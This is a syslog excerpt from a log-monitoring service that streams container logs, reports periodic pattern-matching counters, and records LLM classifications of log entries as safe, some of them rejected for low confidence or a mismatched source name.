Mar 20 00:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:14:31.935230 [watcher] Streaming logs for srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp (e9fbb6ab33ae)
Mar 20 00:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:14:31.935355 [watcher] Streaming logs for srv-captain--login.1.ytr8xgjiz9apso2l6ipovyo42 (ec84599232e6)
Mar 20 00:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:14:31.935493 [watcher] Streaming logs for captain-certbot.1.by454lfepw5mkzfa8e3karl8p (e1aa25883517)
Mar 20 00:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:14:31.935577 [watcher] Streaming logs for captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo (9d722e5b66d0)
Mar 20 00:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:14:31.936719 [watcher] Streaming logs for srv-captain--media-api.1.8iw1rx1hsebohsltxip133ftf (73fec0bbd4c4)
Mar 20 00:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:14:31.937293 [watcher] Streaming logs for captain-netdata-container (974270844dff)
Mar 20 00:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:14:31.938322 [watcher] Streaming logs for captain-captain.1.oqvny8g95v3neveijmxdmdgto (080568bcaf31)
Mar 20 00:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:14:31.938563 [watcher] Streaming logs for srv-captain--media.1.td1ofal2g3beoqwzjiemvmuo4 (91c0395873e8)
Mar 20 00:14:32 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:14:32.427067 [observer] LLM inference server connected
Mar 20 00:15:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:15:01.937878 [observer] Pipeline: processed=4 pattern_hits=4 llm_calls=0 llm_errors=0 learned=0
Mar 20 00:15:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:15:01.937910 [observer] Patterns: hash=4 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=0
Mar 20 00:15:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:15:31.945271 [observer] Pipeline: processed=6 pattern_hits=6 llm_calls=0 llm_errors=0 learned=0
Mar 20 00:15:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:15:31.945301 [observer] Patterns: hash=6 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=0
Mar 20 00:16:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:16:01.970113 [observer] Pipeline: processed=10 pattern_hits=10 llm_calls=0 llm_errors=0 learned=0
Mar 20 00:16:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:16:01.970142 [observer] Patterns: hash=10 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=0
Mar 20 00:16:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:16:31.943935 [observer] Pipeline: processed=12 pattern_hits=12 llm_calls=0 llm_errors=0 learned=0
Mar 20 00:16:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:16:31.943964 [observer] Patterns: hash=12 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=0
Mar 20 00:17:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:17:01.948987 [observer] Pipeline: processed=14 pattern_hits=14 llm_calls=0 llm_errors=0 learned=0
Mar 20 00:17:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:17:01.949022 [observer] Patterns: hash=14 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=0
Mar 20 00:17:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:17:31.934828 [observer] Pipeline: processed=20 pattern_hits=20 llm_calls=0 llm_errors=0 learned=0
Mar 20 00:17:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:17:31.934860 [observer] Patterns: hash=20 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=0
Mar 20 00:18:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:18:01.949104 [observer] Pipeline: processed=22 pattern_hits=22 llm_calls=0 llm_errors=0 learned=0
Mar 20 00:18:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:18:01.949133 [observer] Patterns: hash=22 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=0
Mar 20 00:18:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:18:31.935072 [observer] Pipeline: processed=26 pattern_hits=26 llm_calls=0 llm_errors=0 learned=0
Mar 20 00:18:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:18:31.935097 [observer] Patterns: hash=26 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=0
Mar 20 00:19:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:19:01.949308 [observer] Pipeline: processed=28 pattern_hits=28 llm_calls=0 llm_errors=0 learned=0
Mar 20 00:19:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:19:01.949344 [observer] Patterns: hash=28 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=0
Mar 20 00:19:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:19:31.933575 [observer] Pipeline: processed=32 pattern_hits=32 llm_calls=0 llm_errors=0 learned=0
Mar 20 00:19:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:19:31.933599 [observer] Patterns: hash=32 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=0
Mar 20 00:20:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:20:01.952330 [observer] Pipeline: processed=34 pattern_hits=34 llm_calls=0 llm_errors=0 learned=0
Mar 20 00:20:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:20:01.952361 [observer] Patterns: hash=34 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=0
Mar 20 00:20:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:20:31.951537 [observer] Pipeline: processed=36 pattern_hits=36 llm_calls=0 llm_errors=0 learned=0
Mar 20 00:20:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:20:31.951564 [observer] Patterns: hash=36 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=0
Mar 20 00:21:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:21:01.939795 [observer] Pipeline: processed=40 pattern_hits=40 llm_calls=0 llm_errors=0 learned=0
Mar 20 00:21:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:21:01.939859 [observer] Patterns: hash=40 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=0
Mar 20 00:21:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:21:31.941560 [observer] Pipeline: processed=42 pattern_hits=42 llm_calls=0 llm_errors=0 learned=0
Mar 20 00:21:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:21:31.941587 [observer] Patterns: hash=42 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=0
Mar 20 00:22:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:22:01.943143 [observer] Pipeline: processed=46 pattern_hits=46 llm_calls=0 llm_errors=0 learned=0
Mar 20 00:22:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:22:01.943204 [observer] Patterns: hash=46 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=0
Mar 20 00:22:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:22:31.943474 [observer] Pipeline: processed=50 pattern_hits=50 llm_calls=0 llm_errors=0 learned=0
Mar 20 00:22:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:22:31.943502 [observer] Patterns: hash=50 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=0
Mar 20 00:23:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:23:01.946589 [observer] Pipeline: processed=54 pattern_hits=54 llm_calls=0 llm_errors=0 learned=0
Mar 20 00:23:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:23:01.946620 [observer] Patterns: hash=54 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=0
Mar 20 00:23:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:23:31.935592 [observer] Pipeline: processed=56 pattern_hits=56 llm_calls=0 llm_errors=0 learned=0
Mar 20 00:23:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:23:31.935617 [observer] Patterns: hash=56 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=0
Mar 20 00:24:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:24:01.945273 [observer] Pipeline: processed=58 pattern_hits=58 llm_calls=0 llm_errors=0 learned=0
Mar 20 00:24:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:24:01.945300 [observer] Patterns: hash=58 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=0
Mar 20 00:24:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:24:31.934678 [observer] Pipeline: processed=62 pattern_hits=62 llm_calls=0 llm_errors=0 learned=0
Mar 20 00:24:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:24:31.934703 [observer] Patterns: hash=62 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=0
Mar 20 00:25:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:25:01.948925 [observer] Pipeline: processed=64 pattern_hits=64 llm_calls=0 llm_errors=0 learned=0
Mar 20 00:25:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:25:01.948953 [observer] Patterns: hash=64 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=0
Mar 20 00:25:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:25:31.934483 [observer] Pipeline: processed=68 pattern_hits=68 llm_calls=0 llm_errors=0 learned=0
Mar 20 00:25:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:25:31.934508 [observer] Patterns: hash=68 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=0
Mar 20 00:26:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:26:01.944609 [observer] Pipeline: processed=70 pattern_hits=70 llm_calls=0 llm_errors=0 learned=0
Mar 20 00:26:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:26:01.944645 [observer] Patterns: hash=70 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=0
Mar 20 00:26:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:26:31.933352 [observer] Pipeline: processed=74 pattern_hits=74 llm_calls=0 llm_errors=0 learned=0
Mar 20 00:26:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:26:31.933375 [observer] Patterns: hash=74 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=0
Mar 20 00:27:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:27:01.946692 [observer] Pipeline: processed=76 pattern_hits=76 llm_calls=0 llm_errors=0 learned=0
Mar 20 00:27:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:27:01.946823 [observer] Patterns: hash=76 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=0
Mar 20 00:27:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:27:31.933517 [observer] Pipeline: processed=80 pattern_hits=80 llm_calls=0 llm_errors=0 learned=0
Mar 20 00:27:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:27:31.933540 [observer] Patterns: hash=80 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=0
Mar 20 00:28:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:28:01.944006 [observer] Pipeline: processed=84 pattern_hits=84 llm_calls=0 llm_errors=0 learned=0
Mar 20 00:28:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:28:01.944035 [observer] Patterns: hash=84 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=0
Mar 20 00:28:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:28:31.937021 [observer] Pipeline: processed=86 pattern_hits=86 llm_calls=0 llm_errors=0 learned=0
Mar 20 00:28:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:28:31.937044 [observer] Patterns: hash=86 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=0
Mar 20 00:29:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:29:01.945930 [observer] Pipeline: processed=90 pattern_hits=90 llm_calls=0 llm_errors=0 learned=0
Mar 20 00:29:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:29:01.945967 [observer] Patterns: hash=90 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=0
Mar 20 00:29:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:29:31.943349 [observer] Pipeline: processed=92 pattern_hits=92 llm_calls=0 llm_errors=0 learned=0
Mar 20 00:29:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:29:31.943371 [observer] Patterns: hash=92 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=0
Mar 20 00:30:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:30:01.941530 [observer] Pipeline: processed=96 pattern_hits=96 llm_calls=0 llm_errors=0 learned=0
Mar 20 00:30:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:30:01.941559 [observer] Patterns: hash=96 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=0
Mar 20 00:30:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:30:31.933345 [observer] Pipeline: processed=98 pattern_hits=98 llm_calls=0 llm_errors=0 learned=0
Mar 20 00:30:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:30:31.933368 [observer] Patterns: hash=98 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=0
Mar 20 00:31:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:31:01.975351 [observer] Pipeline: processed=100 pattern_hits=100 llm_calls=0 llm_errors=0 learned=0
Mar 20 00:31:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:31:01.975630 [observer] Patterns: hash=100 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=0
Mar 20 00:31:23 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:31:23.238817 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 20 00:31:23 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:31:23.238853 [analyzer] Confidence 0.72 too low for pattern learning (need 0.85+)
Mar 20 00:31:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:31:31.934762 [observer] Pipeline: processed=105 pattern_hits=104 llm_calls=1 llm_errors=0 learned=0
Mar 20 00:31:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:31:31.934793 [observer] Patterns: hash=104 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=1
Mar 20 00:32:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:32:01.943469 [observer] Pipeline: processed=107 pattern_hits=106 llm_calls=1 llm_errors=0 learned=0
Mar 20 00:32:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:32:01.943493 [observer] Patterns: hash=106 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=1
Mar 20 00:32:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:32:31.936725 [observer] Pipeline: processed=113 pattern_hits=112 llm_calls=1 llm_errors=0 learned=0
Mar 20 00:32:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:32:31.936922 [observer] Patterns: hash=112 prefix=0 regex=0 contains=0 deny=0
alert=0 suppress=0 misses=1 Mar 20 00:33:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:33:01.936710 [observer] Pipeline: processed=115 pattern_hits=114 llm_calls=1 llm_errors=0 learned=0 Mar 20 00:33:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:33:01.936748 [observer] Patterns: hash=114 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=1 Mar 20 00:33:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:33:31.933439 [observer] Pipeline: processed=119 pattern_hits=118 llm_calls=1 llm_errors=0 learned=0 Mar 20 00:33:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:33:31.933462 [observer] Patterns: hash=118 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=1 Mar 20 00:34:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:34:01.960977 [observer] Pipeline: processed=121 pattern_hits=120 llm_calls=1 llm_errors=0 learned=0 Mar 20 00:34:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:34:01.961011 [observer] Patterns: hash=120 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=1 Mar 20 00:34:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:34:31.948522 [observer] Pipeline: processed=123 pattern_hits=122 llm_calls=1 llm_errors=0 learned=0 Mar 20 00:34:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:34:31.948547 [observer] Patterns: hash=122 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=1 Mar 20 00:34:43 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:34:43.031338 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 20 00:34:43 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:34:43.031380 [analyzer] Source hint mismatch: LLM says "tc-qos-helper.sh", actual is "captain-netdata-container" — skipping pattern Mar 20 00:34:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:34:47.495689 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.70 action=allow pattern_type=prefix Mar 
20 00:34:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:34:47.495728 [analyzer] Source hint mismatch: LLM says "tc-qos-helper.sh", actual is "captain-netdata-container" — skipping pattern Mar 20 00:34:53 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:34:53.292354 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.65 action=allow pattern_type=prefix Mar 20 00:34:53 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:34:53.292401 [analyzer] Confidence 0.65 too low for pattern learning (need 0.85+) Mar 20 00:35:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:35:01.947953 [observer] Pipeline: processed=130 pattern_hits=126 llm_calls=4 llm_errors=0 learned=0 Mar 20 00:35:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:35:01.947979 [observer] Patterns: hash=126 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 00:35:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:35:31.935714 [observer] Pipeline: processed=132 pattern_hits=128 llm_calls=4 llm_errors=0 learned=0 Mar 20 00:35:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:35:31.935743 [observer] Patterns: hash=128 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 00:36:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:36:01.949697 [observer] Pipeline: processed=136 pattern_hits=132 llm_calls=4 llm_errors=0 learned=0 Mar 20 00:36:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:36:01.949724 [observer] Patterns: hash=132 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 00:36:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:36:31.935120 [observer] Pipeline: processed=138 pattern_hits=134 llm_calls=4 llm_errors=0 learned=0 Mar 20 00:36:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:36:31.935146 [observer] Patterns: hash=134 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 00:37:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:37:01.949936 [observer] 
Pipeline: processed=142 pattern_hits=138 llm_calls=4 llm_errors=0 learned=0 Mar 20 00:37:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:37:01.949977 [observer] Patterns: hash=138 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 00:37:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:37:31.937850 [observer] Pipeline: processed=144 pattern_hits=140 llm_calls=4 llm_errors=0 learned=0 Mar 20 00:37:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:37:31.937877 [observer] Patterns: hash=140 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 00:38:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:38:01.952984 [observer] Pipeline: processed=148 pattern_hits=144 llm_calls=4 llm_errors=0 learned=0 Mar 20 00:38:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:38:01.953017 [observer] Patterns: hash=144 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 00:38:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:38:31.934566 [observer] Pipeline: processed=152 pattern_hits=148 llm_calls=4 llm_errors=0 learned=0 Mar 20 00:38:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:38:31.934595 [observer] Patterns: hash=148 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 00:39:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:39:01.957823 [observer] Pipeline: processed=154 pattern_hits=150 llm_calls=4 llm_errors=0 learned=0 Mar 20 00:39:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:39:01.957855 [observer] Patterns: hash=150 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 00:39:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:39:31.933527 [observer] Pipeline: processed=158 pattern_hits=154 llm_calls=4 llm_errors=0 learned=0 Mar 20 00:39:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:39:31.933551 [observer] Patterns: hash=154 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 00:40:01 ip-172-26-12-110 observer[1565011]: 
2026/03/20 00:40:01.939218 [observer] Pipeline: processed=160 pattern_hits=156 llm_calls=4 llm_errors=0 learned=0 Mar 20 00:40:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:40:01.939248 [observer] Patterns: hash=156 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 00:40:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:40:31.934253 [observer] Pipeline: processed=164 pattern_hits=160 llm_calls=4 llm_errors=0 learned=0 Mar 20 00:40:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:40:31.934276 [observer] Patterns: hash=160 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 00:41:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:41:01.955802 [observer] Pipeline: processed=166 pattern_hits=162 llm_calls=4 llm_errors=0 learned=0 Mar 20 00:41:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:41:01.955829 [observer] Patterns: hash=162 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 00:41:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:41:31.952688 [observer] Pipeline: processed=168 pattern_hits=164 llm_calls=4 llm_errors=0 learned=0 Mar 20 00:41:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:41:31.952714 [observer] Patterns: hash=164 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 00:42:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:42:01.937973 [observer] Pipeline: processed=172 pattern_hits=168 llm_calls=4 llm_errors=0 learned=0 Mar 20 00:42:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:42:01.938000 [observer] Patterns: hash=168 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 00:42:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:42:31.934480 [observer] Pipeline: processed=174 pattern_hits=170 llm_calls=4 llm_errors=0 learned=0 Mar 20 00:42:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:42:31.934503 [observer] Patterns: hash=170 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 00:43:01 
ip-172-26-12-110 observer[1565011]: 2026/03/20 00:43:01.944699 [observer] Pipeline: processed=180 pattern_hits=176 llm_calls=4 llm_errors=0 learned=0 Mar 20 00:43:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:43:01.944725 [observer] Patterns: hash=176 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 00:43:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:43:31.943108 [observer] Pipeline: processed=182 pattern_hits=178 llm_calls=4 llm_errors=0 learned=0 Mar 20 00:43:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:43:31.943134 [observer] Patterns: hash=178 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 00:44:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:44:01.968749 [observer] Pipeline: processed=186 pattern_hits=182 llm_calls=4 llm_errors=0 learned=0 Mar 20 00:44:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:44:01.969029 [observer] Patterns: hash=182 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 00:44:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:44:31.934875 [observer] Pipeline: processed=188 pattern_hits=184 llm_calls=4 llm_errors=0 learned=0 Mar 20 00:44:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:44:31.934898 [observer] Patterns: hash=184 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 00:45:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:45:01.991953 [observer] Pipeline: processed=190 pattern_hits=186 llm_calls=4 llm_errors=0 learned=0 Mar 20 00:45:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:45:01.991991 [observer] Patterns: hash=186 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 00:45:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:45:31.934014 [observer] Pipeline: processed=194 pattern_hits=190 llm_calls=4 llm_errors=0 learned=0 Mar 20 00:45:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:45:31.934040 [observer] Patterns: hash=190 prefix=0 regex=0 contains=0 deny=0 alert=0 
suppress=0 misses=4 Mar 20 00:46:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:46:01.961130 [observer] Pipeline: processed=196 pattern_hits=192 llm_calls=4 llm_errors=0 learned=0 Mar 20 00:46:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:46:01.961171 [observer] Patterns: hash=192 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 00:46:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:46:31.934478 [observer] Pipeline: processed=200 pattern_hits=196 llm_calls=4 llm_errors=0 learned=0 Mar 20 00:46:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:46:31.934505 [observer] Patterns: hash=196 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 00:47:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:47:01.949272 [observer] Pipeline: processed=202 pattern_hits=198 llm_calls=4 llm_errors=0 learned=0 Mar 20 00:47:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:47:01.949326 [observer] Patterns: hash=198 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 00:47:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:47:31.933746 [observer] Pipeline: processed=206 pattern_hits=202 llm_calls=4 llm_errors=0 learned=0 Mar 20 00:47:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:47:31.933772 [observer] Patterns: hash=202 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 00:48:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:48:01.942817 [observer] Pipeline: processed=210 pattern_hits=206 llm_calls=4 llm_errors=0 learned=0 Mar 20 00:48:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:48:01.942847 [observer] Patterns: hash=206 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 00:48:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:48:31.948569 [observer] Pipeline: processed=212 pattern_hits=208 llm_calls=4 llm_errors=0 learned=0 Mar 20 00:48:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:48:31.948599 [observer] Patterns: hash=208 prefix=0 
